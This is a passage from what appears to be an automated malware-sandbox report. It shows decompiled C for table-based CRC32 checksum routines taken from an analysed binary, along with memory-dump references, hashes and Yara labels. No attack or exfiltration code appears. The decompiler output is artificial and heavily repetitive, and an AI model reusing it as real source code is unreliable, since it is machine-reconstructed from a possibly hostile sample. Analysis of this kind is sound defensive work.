0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4151d0 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4151d0 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x18) * 4) ^  *(0x4151d0 + (_t162 & 0x000000ff) * 4) ^ _t257[6]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (_t248 >> 0x18) * 4) ^  *(0x4151d0 + (_t248 & 0x000000ff) * 4) ^ _t257[7];
						_t257 =  &(_t257[8]);
						_t98 =  *(0x4159d0 + (( *(0x4159d0 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (_t167 >> 0x18) * 4) ^  *(0x4151d0 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (_t167 >> 0x18) * 4) ^  *(0x4151d0 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (_t167 >> 0x18) * 4) ^  *(0x4151d0 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x18) * 4) ^  *(0x4151d0 + (_t253 & 0x000000ff) * 4);
						_t262 = _t262 - 1;
					} while (_t262 != 0);
				}
				if(_t259 >= 4) {
					_t152 = _t259 >> 2;
					do {
						_t103 = _t98 ^ _t257[1];
						_t257 =  &(_t257[1]);
						_t259 = _t259 - 4;
						_t98 =  *(0x4159d0 + (_t103 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (_t103 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (_t103 >> 0x18) * 4) ^  *(0x4151d0 + (_t103 & 0x000000ff) * 4);
						_t152 = _t152 - 1;
					} while (_t152 != 0);
				}
				_t258 =  &(_t257[1]);
				if(_t259 != 0) {
					do {
						_t178 =  *_t258 & 0x000000ff;
						_t258 =  &(_t258[1]);
						_t98 = _t98 << 0x00000008 ^  *(0x4151d0 + (_t98 >> 0x00000018 ^ _t178) * 4);
						_t259 = _t259 - 1;
					} while (_t259 != 0);
				}
				return ( !_t98 >> 0x18) + (( !_t98 & 0x0000ff00) + ( !_t98 << 0x10) << 8) + (_t99 >> 0x00000008 & 0x0000ff00);
			}















                                        0x00410990
                                        0x004109ab
                                        0x004109bb
                                        0x004109c1
                                        0x004109c6
                                        0x004109c8
                                        0x004109cd
                                        0x004109d5
                                        0x004109db
                                        0x004109e2
                                        0x004109e3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004109e3
                                        0x004109c8
                                        0x004109e5
                                        0x004109e5
                                        0x004109eb
                                        0x004109f4
                                        0x004109f7
                                        0x00410b24
                                        0x00410b56
                                        0x00410b63
                                        0x00410b66
                                        0x00410bd6
                                        0x00410bdd
                                        0x00410bdd
                                        0x00410be4
                                        0x00410be8
                                        0x00410bec
                                        0x00410bf0
                                        0x00410bf0
                                        0x00410bf3
                                        0x00410bfd
                                        0x00410c33
                                        0x00410c35
                                        0x00410c35
                                        0x00410bf0
                                        0x00410c38
                                        0x00410c3d
                                        0x00410c40
                                        0x00410c40
                                        0x00410c43
                                        0x00410c50
                                        0x00410c57
                                        0x00410c57
                                        0x00410c40
                                        0x00410c83

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7eac0f96e64598c71ae0bc8e9b98f79b831856c9aa73b7c5d6375e3f22e346c1
                                        • Instruction ID: 4e5a86a71a9481498bb69a16db2f56c937383f2ce1e47845254e41c30638d97c
                                        • Opcode Fuzzy Hash: 7eac0f96e64598c71ae0bc8e9b98f79b831856c9aa73b7c5d6375e3f22e346c1
                                        • Instruction Fuzzy Hash: C071B772A20C52CBE718CF1DEC907B63353E7C9340F99C639DA028379AE538B961C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410970, Relevance: .2, Instructions: 193COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00410970() {
				intOrPtr _t93;
				signed int _t95;
				signed char _t98;
				signed char _t146;
				signed int* _t164;
				signed int _t165;
				signed int _t202;
				signed char _t234;
				unsigned int _t236;
				unsigned int _t241;
				signed int* _t242;
				signed int* _t243;
				unsigned int _t246;
				void* _t248;

				_t93 =  *((intOrPtr*)(_t248 + 8));
				if(_t93 != 0) {
					 *((intOrPtr*)(_t248 + 8)) = _t93;
					_t146 =  *(_t248 + 0xc);
					_t95 =  !( *(_t248 + 4));
					_t236 =  *(_t248 + 0x14);
					if(_t236 != 0) {
						while((_t146 & 0x00000003) != 0) {
							_t202 =  *_t146 & 0x000000ff;
							_t146 = _t146 + 1;
							_t95 = _t95 >> 0x00000008 ^  *(0x4141d0 + ((_t202 ^ _t95) & 0x000000ff) * 4);
							_t236 = _t236 - 1;
							if(_t236 != 0) {
								continue;
							}
							goto L6;
						}
					}
					L6:
					if(_t236 >= 0x20) {
						_t246 = _t236 >> 5;
						do {
							_t219 =  *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4);
							 *(_t248 + 0x18) = _t146 + 8;
							_t242 =  *(_t248 + 0x18);
							_t229 =  *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  